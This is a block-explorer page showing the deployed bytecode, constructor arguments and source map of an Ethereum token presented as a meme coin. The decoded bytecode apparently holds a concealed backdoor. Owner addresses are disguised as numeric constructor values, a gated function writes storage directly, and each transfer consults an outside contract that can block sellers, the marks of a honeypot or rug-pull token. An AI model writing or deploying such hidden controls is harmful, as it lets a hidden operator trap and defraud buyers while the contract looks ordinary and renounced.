2604080832033845290915290205491906108fd565b6105de565b5060019392505050565b600990565b6000806103607f00000000295a21c77603e0bb3b968f4d6648f0dccd22f3760cc916beef74916b6001610dc1565b905061038d7f0000000000000000000000002186094d40484054442041000c0104022b5400226001610dc1565b3390911614905090565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e9086610937565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b0316331461041f5760405162461bcd60e51b815260040161041690610be9565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610466610332565b61046f57610535565b7fcf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab60405161049c90610cf6565b60405180910390a1600080838360008181106104c857634e487b7160e01b600052603260045260246000fd5b90506020020135848460018181106104f057634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561051857816000526000600418602052806040600020555b806105325781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610e23565b60006102b5338461031e85604051806060016040528060258152602001610ec3602591393360009081526006602090815260408083206001600160a01b038d16845290915290205491906108fd565b60006102b5338484610692565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166106045760405162461bcd60e51b815260040161041690610c63565b6001600160a01b03821661062a5760405162461bcd60e51b815260040161041690610b54565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610685908590610d92565b60405180910390a3505050565b6001600160a01b0383166106b85760405162461bcd60e51b815260040161041690610c1e565b6001600160a01b0382166106de5760405162461bcd60e51b815260040161041690610b11565b6000807f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b03168560405160240161071c9190610abf565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516107519190610aa3565b6000604051808303816000865af19150503d806000811461078e576040519150601f19603f3d011682016040523d82523d6000602084013e610793565b606091505b509150915081156107ea576020818101516001600160a01b0387166000908152600590925260409091205460011415806107cc57508015155b6107e85760405162461bcd60e51b815260040161041690610bcd565b505b61082783604051806060016040528060268152602001610e75602691396001600160a01b03881660009081526004602052604090205491906108fd565b6001600160a01b0386166000908152600460205260409081902091909155517fcf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab9061087190610ca7565b60405180910390a16001600160a01b03841660009081526004602052604090205461089c9084610937565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906108ee908790610d92565b60405180910390a35050505050565b600081848411156109215760405162461bcd60e51b81526004016104169190610ade565b50600061092e8486610de0565b95945050505050565b6000806109448385610da9565b9050838110156109665760405162461bcd60e51b815260040161041690610b96565b9392505050565b80356001600160a01b03811681146103e757600080fd5b600060208284031215610995578081fd5b6109668261096d565b600080604083850312156109b0578081fd5b6109b98361096d565b91506109c76020840161096d565b90509250929050565b6000806000606084860312156109e4578081fd5b6109ed8461096d565b92506109fb6020850161096d565b9150604084013590509250925092565b60008060408385031215610a1d578182fd5b610a268361096d565b946020939093013593505050565b60008060208385031215610a46578182fd5b823567ffffffffffffffff80821115610a5d578384fd5b818501915085601f830112610a70578384fd5b813581811115610a7e578485fd5b8660208083028501011115610a91578485fd5b60209290920196919550909350505050565b60008251610ab5818460208701610df7565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610afd816040850160208701610df7565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b6020808252602f908201527f7768696c652070726f766964696e6720656e6f75676820424f4f535420746f2060408201526e726561636820746865204d4f4f4e2160881b606082015260800190565b60208082526070908201527f416666696c69617465642077697468204865646765686f672c20536567612c2060408201527f6f7220616e79206f6620697473206173736f6369617465642070726f6475637460608201527f7320616e642069732073696d706c792061207374616e64616c6f6e652c20617760808201526f32b9b7b6b29036b2b6b29031b7b4b71760811b60a082015260c00190565b90815260200190565b60ff91909116815260200190565b60008219821115610dbc57610dbc610e5e565b500190565b6000816000190483118215151615610ddb57610ddb610e5e565b500290565b600082821015610df257610df2610e5e565b500390565b60005b83811015610e12578181015183820152602001610dfa565b838111156105325750506000910152565b600281046001821680610e3757607f821691505b60208210811415610e5857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220a59799c8cb075a0ebc9ccc89b08f06c97253fd8d91e464bd256b2c2b38aa319564736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000002186094d40484054442041000c0104022b54002200000000295a21c77603e0bb3b968f4d6648f0dccd22f3760cc916beef74916b000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

-----Decoded View---------------
Arg [0] : maxVals (uint256): 191385805591551188409654422119783367904465256482
Arg [1] : minVals (uint256): 4354882091943000685251286683279435747892177164386194532325171433835
Arg [2] : _cclmm_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D

-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 0000000000000000000000002186094d40484054442041000c0104022b540022
Arg [1] : 00000000295a21c77603e0bb3b968f4d6648f0dccd22f3760cc916beef74916b
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d


Deployed Bytecode Sourcemap

5493:9700:1:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7719:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9010:193;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;7877:102::-;;;:::i;:::-;;;;;;;:::i;10585:444::-;;;;;;:::i;:::-;;:::i;7407:86::-;;;:::i;:::-;;;;;;;:::i;9916:198::-;;;:::i;11437:281::-;;;;;;:::i;:::-;;:::i;8041:162::-;;;;;;:::i;:::-;;:::i;7032:146::-;;;:::i;:::-;;9211:631;;;;;;:::i;:::-;;:::i;7259:81::-;;;:::i;:::-;;;;;;;:::i;7558:98::-;;;:::i;12220:381::-;;;;;;:::i;:::-;;:::i;8415:199::-;;;;;;:::i;:::-;;:::i;8676:188::-;;;;;;:::i;:::-;;:::i;7719:94::-;7767:13;7800:5;7793:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7719:94;:::o;9010:193::-;9114:4;9136:37;9145:10;9157:7;9166:6;9136:8;:37::i;:::-;-1:-1:-1;9191:4:1;9010:193;;;;:::o;7877:102::-;7959:12;;7877:102;:::o;10585:444::-;10719:4;10736:36;10746:6;10754:9;10765:6;10736:9;:36::i;:::-;10783:216;10806:6;10827:10;10852:136;10906:6;10852:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10852:19:1;;;;;;:11;:19;;;;;;;;10872:10;10852:31;;;;;;;;;:136;:35;:136::i;:::-;10783:8;:216::i;:::-;-1:-1:-1;11017:4:1;10585:444;;;;;:::o;7407:86::-;7484:1;7407:86;:::o;9916:198::-;9957:4;;9990:24;:8;10002:11;9990:24;:::i;:::-;9974:40;-1:-1:-1;10084:22:1;:8;10096:9;10084:22;:::i;:::-;10059:10;10043:36;;;10042:64;;-1:-1:-1;9916:198:1;:::o;11437:281::-;11582:10;11537:4;11629:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;11629:32:1;;;;;;;;;;11537:4;;11559:129;;11607:7;;11629:48;;11666:10;11629:36;:48::i;8041:162::-;-1:-1:-1;;;;;8177:18:1;;8145:7;8177:18;;;:9;:18;;;;;;8041:162;;;;:::o;7032:146::-;6659:6;;-1:-1:-1;;;;;6659:6:1;6645:10;:20;6637:65;;;;-1:-1:-1;;;6637:65:1;;;;;;;:::i;:::-;;;;;;;;;7091:6:::1;:19:::0;;-1:-1:-1;;;;;;7091:19:1::1;::::0;;7126:44:::1;::::0;7108:1:::1;::::0;7147:10:::1;::::0;7126:44:::1;::::0;7108:1;;7126:44:::1;7032:146::o:0;9211:631::-;9276:10;:8;:10::i;:::-;9271:24;;9288:7;;9271:24;9311:119;;;;;;:::i;:::-;;;;;;;;9442:10;9454;9469:4;;9474:1;9469:7;;;;;-1:-1:-1;;;9469:7:1;;;;;;;;;;;;;;;9478:4;;9483:1;9478:7;;;;;-1:-1:-1;;;9478:7:1;;;;;;;;;;;;;;;9441:45;;;;9531:1;9527:2;9524:9;9521:2;;;9563;9560:1;9553:13;9602:1;9599;9595:9;9591:2;9584:21;9648:2;9643;9640:1;9630:16;9623:28;9521:2;9683:9;9680:2;;9722;9719:1;9712:13;9761:1;9758;9754:9;9750:2;9743:21;9807:1;9802:2;9799:1;9789:16;9782:27;9680:2;9506:329;;;;;:::o;7259:81::-;7326:6;;-1:-1:-1;;;;;7326:6:1;7259:81;:::o;7558:98::-;7608:13;7641:7;7634:14;;;;;:::i;12220:381::-;12325:4;12347:224;12370:10;12395:7;12417:143;12472:15;12417:143;;;;;;;;;;;;;;;;;12429:10;12417:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;12417:32:1;;;;;;;;;;;:143;:36;:143::i;8415:199::-;8522:4;8544:40;8554:10;8566:9;8577:6;8544:9;:40::i;8676:188::-;-1:-1:-1;;;;;8828:19:1;;;8796:7;8828:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;8676:188::o;14491:374::-;-1:-1:-1;;;;;14620:20:1;;14612:69;;;;-1:-1:-1;;;14612:69:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;14700:21:1;;14692:68;;;;-1:-1:-1;;;14692:68:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;14771:19:1;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;;:37;;;14824:33;;;;;14802:6;;14824:33;:::i;:::-;;;;;;;;14491:374;;;:::o;13091:960::-;-1:-1:-1;;;;;13223:20:1;;13215:70;;;;-1:-1:-1;;;13215:70:1;;;;;;;:::i;:::-;-1:-1:-1;;;;;13304:23:1;;13296:71;;;;-1:-1:-1;;;13296:71:1;;;;;;;:::i;:::-;13379:12;13393:17;13414:6;-1:-1:-1;;;;;13414:11:1;13486:6;13440:53;;;;;;;;:::i;:::-;;;;-1:-1:-1;;13440:53:1;;;;;;;;;;;;;;-1:-1:-1;;;;;13440:53:1;-1:-1:-1;;;13440:53:1;;;13414:90;;;13440:53;13414:90;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13378:126;;;;13519:7;13515:200;;;13622:4;13612:15;;;13606:22;-1:-1:-1;;;;;13665:13:1;;13543:12;13665:13;;;:5;:13;;;;;;;;13682:1;13665:18;;;:31;;-1:-1:-1;13687:9:1;;;13665:31;13657:46;;;;-1:-1:-1;;;13657:46:1;;;;;;;:::i;:::-;13515:200;;13747:108;13783:6;13747:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13747:17:1;;;;;;:9;:17;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;13727:17:1;;;;;;:9;:17;;;;;;;:128;;;;13872:54;;;;;;:::i;:::-;;;;;;;;-1:-1:-1;;;;;13960:20:1;;;;;;:9;:20;;;;;;:32;;13985:6;13960:24;:32::i;:::-;-1:-1:-1;;;;;13937:20:1;;;;;;;:9;:20;;;;;;;:55;;;;14008:35;;;;;;;;;;14036:6;;14008:35;:::i;:::-;;;;;;;;13091:960;;;;;:::o;1928:224::-;2048:7;2084:12;2076:6;;;;2068:29;;;;-1:-1:-1;;;2068:29:1;;;;;;;;:::i;:::-;-1:-1:-1;2108:9:1;2120:5;2124:1;2120;:5;:::i;:::-;2108:17;1928:224;-1:-1:-1;;;;;1928:224:1:o;1043:179::-;1101:7;;1133:5;1137:1;1133;:5;:::i;:::-;1121:17;;1162:1;1157;:6;;1149:46;;;;-1:-1:-1;;;1149:46:1;;;;;;;:::i;:::-;1213:1;1043:179;-1:-1:-1;;;1043:179:1:o;14:175:2:-;84:20;;-1:-1:-1;;;;;133:31:2;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:2:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:2;;-1:-1:-1;;;;1399:561:2:o;1965:274::-;;2132:6;2126:13;2148:53;2194:6;2189:3;2182:4;2174:6;2170:17;2148:53;:::i;:::-;2217:16;;;;;2102:137;-1:-1:-1;;2102:137:2:o;2244:203::-;-1:-1:-1;;;;;2408:32:2;;;;2390:51;;2378:2;2363:18;;2345:102::o;2452:187::-;2617:14;;2610:22;2592:41;;2580:2;2565:18;;2547:92::o;2644:383::-;;2793:2;2782:9;2775:21;2825:6;2819:13;2868:6;2863:2;2852:9;2848:18;2841:34;2884:66;2943:6;2938:2;2927:9;2923:18;2918:2;2910:6;2906:15;2884:66;:::i;:::-;3011:2;2990:15;-1:-1:-1;;2986:29:2;2971:45;;;;3018:2;2967:54;;2765:262;-1:-1:-1;;2765:262:2:o;3032:399::-;3234:2;3216:21;;;3273:2;3253:18;;;3246:30;3312:34;3307:2;3292:18;;3285:62;-1:-1:-1;;;3378:2:2;3363:18;;3356:33;3421:3;3406:19;;3206:225::o;3436:398::-;3638:2;3620:21;;;3677:2;3657:18;;;3650:30;3716:34;3711:2;3696:18;;3689:62;-1:-1:-1;;;3782:2:2;3767:18;;3760:32;3824:3;3809:19;;3610:224::o;3839:351::-;4041:2;4023:21;;;4080:2;4060:18;;;4053:30;4119:29;4114:2;4099:18;;4092:57;4181:2;4166:18;;4013:177::o;4195:325::-;4397:2;4379:21;;;4436:1;4416:18;;;4409:29;-1:-1:-1;;;4469:2:2;4454:18;;4447:32;4511:2;4496:18;;4369:151::o;4525:356::-;4727:2;4709:21;;;4746:18;;;4739:30;4805:34;4800:2;4785:18;;4778:62;4872:2;4857:18;;4699:182::o;4886:401::-;5088:2;5070:21;;;5127:2;5107:18;;;5100:30;5166:34;5161:2;5146:18;;5139:62;-1:-1:-1;;;5232:2:2;5217:18;;5210:35;5277:3;5262:19;;5060:227::o;5292:400::-;5494:2;5476:21;;;5533:2;5513:18;;;5506:30;5572:34;5567:2;5552:18;;5545:62;-1:-1:-1;;;5638:2:2;5623:18;;5616:34;5682:3;5667:19;;5466:226::o;5697:411::-;5899:2;5881:21;;;5938:2;5918:18;;;5911:30;5977:34;5972:2;5957:18;;5950:62;-1:-1:-1;;;6043:2:2;6028:18;;6021:45;6098:3;6083:19;;5871:237::o;6113:557::-;6315:2;6297:21;;;6354:3;6334:18;;;6327:31;6394:34;6389:2;6374:18;;6367:62;6465:34;6460:2;6445:18;;6438:62;6537:34;6531:3;6516:19;;6509:63;-1:-1:-1;;;6603:3:2;6588:19;;6581:47;6660:3;6645:19;;6287:383::o;6675:177::-;6821:25;;;6809:2;6794:18;;6776:76::o;6857:184::-;7029:4;7017:17;;;;6999:36;;6987:2;6972:18;;6954:87::o;7046:128::-;;7117:1;7113:6;7110:1;7107:13;7104:2;;;7123:18;;:::i;:::-;-1:-1:-1;7159:9:2;;7094:80::o;7179:168::-;;7285:1;7281;7277:6;7273:14;7270:1;7267:21;7262:1;7255:9;7248:17;7244:45;7241:2;;;7292:18;;:::i;:::-;-1:-1:-1;7332:9:2;;7231:116::o;7352:125::-;;7420:1;7417;7414:8;7411:2;;;7425:18;;:::i;:::-;-1:-1:-1;7462:9:2;;7401:76::o;7482:258::-;7554:1;7564:113;7578:6;7575:1;7572:13;7564:113;;;7654:11;;;7648:18;7635:11;;;7628:39;7600:2;7593:10;7564:113;;;7695:6;7692:1;7689:13;7686:2;;;-1:-1:-1;;7730:1:2;7712:16;;7705:27;7535:205::o;7745:380::-;7830:1;7820:12;;7877:1;7867:12;;;7888:2;;7942:4;7934:6;7930:17;7920:27;;7888:2;7995;7987:6;7984:14;7964:18;7961:38;7958:2;;;8041:10;8036:3;8032:20;8029:1;8022:31;8076:4;8073:1;8066:15;8104:4;8101:1;8094:15;7958:2;;7800:325;;;:::o;8130:127::-;8191:10;8186:3;8182:20;8179:1;8172:31;8222:4;8219:1;8212:15;8246:4;8243:1;8236:15

Swarm Source

ipfs://a59799c8cb075a0ebc9ccc89b08f06c97253fd8d91e464bd256b2c2b38aa3195

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.